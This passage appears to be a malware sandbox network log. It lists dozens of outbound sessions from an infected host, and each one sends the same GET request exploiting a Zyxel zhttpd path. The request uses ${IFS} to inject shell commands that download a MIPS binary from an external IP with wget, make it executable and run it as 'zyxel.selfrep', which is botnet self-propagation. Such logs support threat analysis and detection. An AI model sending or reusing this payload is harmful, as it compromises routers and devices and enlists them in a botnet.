                                                      Feb 2, 2024 06:34:59.113255024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      136192.168.2.1455804186.197.215.128443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.113327026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      137192.168.2.1447980119.132.240.60443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.113384962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      138192.168.2.1433168176.177.123.156443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.113464117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      139192.168.2.1460648152.244.43.235443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.113519907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      140192.168.2.144719468.28.66.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.113526106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      141192.168.2.144510859.9.179.142443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.113589048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      142192.168.2.1438682184.98.194.21443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.113730907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      143192.168.2.1442254191.51.113.232443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.113763094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      144192.168.2.1434190182.52.185.176443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.113812923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      145192.168.2.1434170146.216.162.74443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.113917112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      146192.168.2.1450346153.230.33.199443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.113992929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      147192.168.2.145058071.34.78.207443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.114089966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      148192.168.2.1434764187.8.20.66443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.114171982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      149192.168.2.143648214.49.83.23443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.114198923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      150192.168.2.1457946217.249.248.54443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.114285946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      151192.168.2.146092645.124.248.21443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.114368916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      152192.168.2.1449854139.251.42.48443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.114479065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      153192.168.2.145061672.125.65.16443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.114554882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      154192.168.2.145822878.118.59.104443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.114713907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      155192.168.2.1438924213.129.93.216443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.114748001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      156192.168.2.1455270122.2.182.231443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.114834070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      157192.168.2.144667479.110.69.135443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.114905119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      158192.168.2.144728087.253.98.49443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.114998102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      159192.168.2.1444864138.86.41.136443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.115021944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      160192.168.2.144405092.85.245.198443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.115120888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      161192.168.2.143423249.153.54.245443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.115191936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      162192.168.2.1435112139.125.66.115443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.115231991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      163192.168.2.145026078.17.63.92443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.115299940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      164192.168.2.146098081.95.252.104443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.115351915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      165192.168.2.145259468.223.191.214443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.115432024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      166192.168.2.1444166176.234.233.252443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.115523100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      167192.168.2.145543868.12.164.194443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.115578890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      168192.168.2.1456364204.187.89.99443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.115665913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      169192.168.2.143956640.78.117.152443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.115844011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      170192.168.2.144549462.66.234.166443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.115874052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      171192.168.2.14340785.146.20.46443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.115925074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      172192.168.2.1455124174.255.17.227443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.115952969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      173192.168.2.1453114196.199.89.157443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.116051912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      174192.168.2.1447514206.210.247.31443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.116151094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      175192.168.2.1432884182.174.61.142443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.116210938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      176192.168.2.1455702183.22.45.121443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.116353989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      177192.168.2.1439774122.114.140.247443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.116458893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      178192.168.2.1456166170.249.37.224443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.116528034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      179192.168.2.1445428176.19.2.189443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.116606951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      180192.168.2.1457622210.1.82.214443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.116719007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      181192.168.2.1451778153.173.196.227443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.116780043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      182192.168.2.143829053.208.203.184443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.116833925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      183192.168.2.144395276.63.235.133443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.116908073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      184192.168.2.1454502109.218.70.112443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.116957903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      185192.168.2.1458738195.48.180.192443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.116990089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      186192.168.2.1434384204.32.155.71443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.117028952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      187192.168.2.1438274201.142.188.176443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.117068052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      188192.168.2.1453078118.126.254.71443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.117139101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      189192.168.2.1445178189.68.185.71443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.117168903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      190192.168.2.144798625.146.141.87443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.117219925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      191192.168.2.145770051.235.176.41443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.117290020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      192192.168.2.144518417.49.48.61443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.117364883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      193192.168.2.146076289.126.247.17443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.117481947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      194192.168.2.1445722158.82.198.21443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.117568970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      195192.168.2.146029858.246.135.76443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.117650032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      196192.168.2.1444994168.198.16.158443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:00.090965986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      197192.168.2.1441694185.30.73.59443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:00.091018915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      198192.168.2.144376475.15.210.249443
                                                      TimestampBytes transferredDirectionData
